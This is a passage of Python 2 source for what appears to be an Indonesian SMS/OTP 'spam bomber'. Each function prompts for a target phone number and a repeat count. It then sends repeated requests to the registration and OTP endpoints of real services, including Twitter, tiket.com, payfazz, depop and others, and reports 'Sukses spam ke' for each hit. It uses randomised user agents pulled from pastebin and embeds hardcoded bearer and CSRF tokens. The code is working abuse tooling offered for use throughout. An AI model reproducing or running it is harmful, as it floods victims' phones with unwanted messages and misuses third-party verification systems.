data = {'phone': no, 'use_voice': 'false', 'send_auto_verify_hash': 'false', 'flow_token': 'g;158355847049070709:-1583558508469:16afWpmiAuZzd9TbbmXzWWQ0:0'}
datajson = json.dumps(data)
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'origin': 'https://mobile.twitter.com', 'x-twitter-client-language': 'en', 'x-csrf-token': '76aee95c7468a28309eed1b1c1f3df98', 'authorization': 'Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA', 'content-type': 'application/json', 'user-agent': '{acak}', 'x-guest-token': '1236159940089098240', 'x-twitter-active-user': 'yes', 'accept': ' */*', 'referer': 'https://mobile.twitter.com/i/flow/signup', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://api.twitter.com/1.1/onboarding/begin_verification.json', headers=hd, json=datajson).text
print a
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
tw()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def jtk():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
red()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
red()
print
ur = requests.get('https://tjetak.com/register')
parse = bs(ur.text, features='html.parser')
token = parse.find('meta', {'name': 'csrf-token'})['content']
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Host': 'www.tjetak.com', 'content-length': '22', 'accept': '*/*', 'origin': 'https://www.tjetak.com', 'user-agent': '{acak}', 'x-xsrf-token': 'eyJpdiI6IlVwN3JzZmhmMUdUZ3cxQUVzSDlNT2c9PSIsInZhbHVlIjoiSktFQk55enZGbkZFZWEwbTI0dkVTQXE2bFwvYzJYMGlnOU5yNzNQdTlRMmlFT1N3Yk5EU2t6eHIxQ1ZoZ2c4U1IiLCJtYWMiOiJhZjRhMTIxNDdlZjBjZjRjNTcxYjhlODU4NDU2OTg1OGNkZTc0ODliMGMxYWY3YzllOWFiMjQ1NGM1ZjI0NjhlIn0=', 'x-csrf-token': token, 'content-type': 'application/json;charset=UTF-8', 'accept': 'application/json, text/plain, */*', 'x-requested-with': 'XMLHttpRequest', 'save-data': 'on', 'referer': 'https://www.tjetak.com/register', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
a = r.post('https://www.tjetak.com/register/send', headers=hd, json={'phone': no}).text
print a
metu()
def sop():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
sop()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
sop()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Host': 'api.sooplai.com', 'content-length': '23', 'accept': 'application/json, text/plain, */*', 'origin': 'https://www.sooplai.com', 'user-agent': '{acak}', 'content-type': 'application/json', 'referer': 'https://www.sooplai.com/verify/sms?phone=' + no + '®ister=true', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://api.sooplai.com/customer/register/otp/request', headers=hd, json={'phone': no})
if '' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
sop()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def tkt():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: +628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
tkt()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
tkt()
data = [{'operationName': 'postOtpGenerateV2', 'variables': {'recipient': no, 'requestType': 'REGISTER_OTP'}, 'query': 'mutation postOtpGenerateV2($recipient: String, $requestType: String, $ignoreRecipient: Boolean, $magicLinkAdditionalParameter: String, $fullName: String, $deviceId: String) {\n otpGenerateV2(recipient: $recipient, requestType: $requestType, ignoreRecipient: $ignoreRecipient, magicLinkAdditionalParameter: $magicLinkAdditionalParameter, fullName: $fullName, deviceId: $deviceId) {\n code\n message\n data {\n exist\n expired\n maskedAccount\n nextAvailableRequest\n trxId\n __typename\n }\n errors\n __typename\n }\n}\n'}]
datajson = json.dumps(data)
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'origin': 'https://m.tiket.com', 'user-agent': '{acak}', 'content-type': 'application/json', 'referer': 'https://m.tiket.com/login/?ref=https%3A%2F%2Fm.tiket.com%2Fmyaccount', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://gql.tiket.com/', headers=hd, data=datajson)
if 'SUCCESS' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(30)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(30)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
tkt()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def sek():
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
sek()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
sek()
print
ur = requests.get('https://en.seekmi.com/register')
parse = bs(ur.text, features='html.parser')
token = parse.find('meta', {'name': 'csrf-token'})['content']
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'content-length': '29', 'origin': 'https://en.seekmi.com', 'x-csrf-token': token, 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'accept': '*/*', 'x-requested-with': 'XMLHttpRequest', 'save-data': 'on', 'referer': 'https://en.seekmi.com/register', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
a = r.post('https://en.seekmi.com/ajax/send-otp', headers=hd, data={'phone': no, 'name': 'Bangsat'}).text
print a
metu()
def pfz():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
pfz()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
pfz()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Host': 'api.payfazz.com', 'content-length': '17', 'accept': '*/*', 'origin': 'https://www.payfazz.com', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://www.payfazz.com/register/BEN6ZF74XL', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://api.payfazz.com/v2/phoneVerifications', headers=hd, data={'phone': no})
if 'phoneVerificationId' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
pfz()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def rwk():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: +628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
rwk()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
rwk()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Connection': 'keep-alive', 'Content-Length': '77', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Origin': 'https://web.rework.id', 'X-Requested-With': 'XMLHttpRequest', 'Save-Data': 'on', 'User-Agent': '{acak}', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer': 'https://web.rework.id/register', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://web.rework.id/nexmo/sendCode', headers=hd, data={'_token': 'oZauPolVAhritYJwD3UNINtQTeBUGcTDwKZkS8EM', 'mobile_phone': no})
if 'succeed' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
rwk()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def dmt():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
dmt()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
dmt()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Connection': 'keep-alive', 'Content-Length': '97', 'Accept': '*/*', 'Origin': 'https://domaten.com', 'X-Requested-With': 'XMLHttpRequest', 'Save-Data': 'on', 'User-Agent': '{acak}', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer': 'https://domaten.com/signup/', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
a = r.post('https://domaten.com/wp-admin/admin-ajax.php', headers=hd, data={'action': 'ihs_otp_ajax_hook', 'security': '301afb711c', 'data[phone]': no, 'data[country_code]': '62'}).text
print a
metu()
def qcr():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
qcr()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
qcr()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'content-length': '36', 'accept': '*/*', 'origin': 'https://www.qikcircle.com', 'x-requested-with': 'XMLHttpRequest', 'save-data': 'on', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://www.qikcircle.com/Register', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://www.qikcircle.com/SendSmsOtp', headers=hd, data={'countryCode': '+62', 'phoneNo': no})
if 'OTP Sent' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
qcr()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def bos():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
bos()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
bos()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Connection': 'keep-alive', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest', 'Save-Data': 'on', 'user-agent': '{acak}', 'referer': 'https://bos.smartlink.id/register', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.get('https://bos.smartlink.id/getOTPRegister/' + no + '/wa', headers=hd)
if 'success' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(120)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(120)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
bos()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def ace():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
ace()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
ace()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Accept': '*/*', 'X-Requested-With': 'XMLHttpRequest', 'Save-Data': 'on', 'user-agent': '{acak}', 'referer': 'https://www.acehardware.co.id/membership/register', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.get('https://www.acehardware.co.id/membership/send-otp?cellphone=' + no + '&otp_type=register', headers=hd)
if 'Silahkan mencoba lagi besok' in a.text:
print '%s[%s%s%s] %sLimit 1 hari, coba lago besok%s' % (W1, R1, z, W1, W0, no)
time.sleep(1)
else:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
ace()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def bkm():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
bkm()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
bkm()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'content-length': '27', 'accept': '*/*', 'origin': 'https://nabil.my.id', 'x-requested-with': 'XMLHttpRequest', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://nabil.my.id/Bakmi_Otp', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://nabil.my.id/Tools/Prank-Tools/Bakmi/api.php', headers=hd, data={'nomor': no, 'jumlah': '1'})
if 'Terkirim' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
bkm()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def rp():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
rp()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
dt = {'mobile': no, 'noise': '1583590641573155574', 'request_time': '158359064157312', 'access_token': '11111'}
data = json.dumps(dt)
r = requests.Session()
for spam in range(3):
try:
a = r.post('https://apiservice.rupiahcepatweb.com/webapi/v1/request_login_register_auth_code', headers={'accept': 'text/html, application/xhtml+xml, application/json, */*', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 'content-length': '166', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'origin': 'https://h5.rupiahcepatweb.com', 'referer': 'https://h5.rupiahcepatweb.com/dua2/pages/openPacket/openPacket.html?activityId=11&invite=200219190100215723', 'sec-fetch-dest': 'empty', 'sec-fetch-mode': 'cors', 'sec-fetch-site': 'same-site', 'user-agent': '{acak}'}, data={'data': data}).text
b = json.loads(a)['code']
if b == 0:
print '\n%s[%s*%s] %sSukses spam ke %s' % (W1, G1, W1, W0, no)
wait(60)
else:
print '\n%s[%s*%s] %sGagal spam ke %s' % (W1, R1, W1, W0, no)
wait(60)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
rp()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def kk():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
kk()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
kk()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
hd = {'Host': 'www.kkcoin.com', 'cache-control': 'max-age=0', 'save-data': 'on', 'upgrade-insecure-requests': '1', 'user-agent': '{acak}', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.get('https://www.kkcoin.com/phone/get_phone_code?mobile_country=62&mobile=' + no + '&type=5', headers=hd)
if 'Invalid Request' in a.text:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(1)
elif 'Please try again in 1' in a.text:
print '\n%s[%s%s%s] %sTunggu 1 menit' % (W1, R1, z, W1, W0)
wait(60)
else:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(1)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
exit()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
kk()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def dp():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
dp()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
dp()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Content-Length': '49', 'Accept': 'application/json, text/plain, */*', 'Origin': 'https://signup.depop.com', 'Save-Data': 'on', 'User-Agent': '{acak}', 'Content-Type': 'application/json', 'Referer': 'https://signup.depop.com/', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
at = {'phone_number': no, 'country_code': 'ID'}
dt = json.dumps(at)
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.put('https://webapi.depop.com/api/auth/v1/verify/phone', headers=hd, data=dt)
if 'false' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
dp()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def kpt():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
kpt()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
kpt()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
hd = {'content-length': '62', 'accept': 'application/json, text/javascript, */*; q=0.01', 'origin': 'https://www.kelaspintar.id', 'x-requested-with': 'XMLHttpRequest', 'save-data': 'on', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://www.kelaspintar.id/', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://www.kelaspintar.id/user/otpverification', headers=hd, data={'user_mobile': no, 'otp_type': 'send_otp_reg', 'mobile_code': '+62'})
if 'successfully' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
exit()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
kpt()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def cml():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
cml()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
cml()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
hd = {'content-length': '83', 'accept': 'application/json, text/javascript, */*; q=0.01', 'origin': 'https://global.cmlink.com', 'save-data': 'on', 'user-agent': '{acak}', 'content-type': 'application/json', 'referer': 'https://global.cmlink.com/global/pc/views/register.html', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
n = 104
at = {'accountName': no, 'accountType': n, 'serviceType': '104', 'language': '0'}
dt = json.dumps(at)
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://global.cmlink.com/aep/APP_getVerificationCode_SBO/v1', headers=hd, data=dt)
if 'success' in a.text:
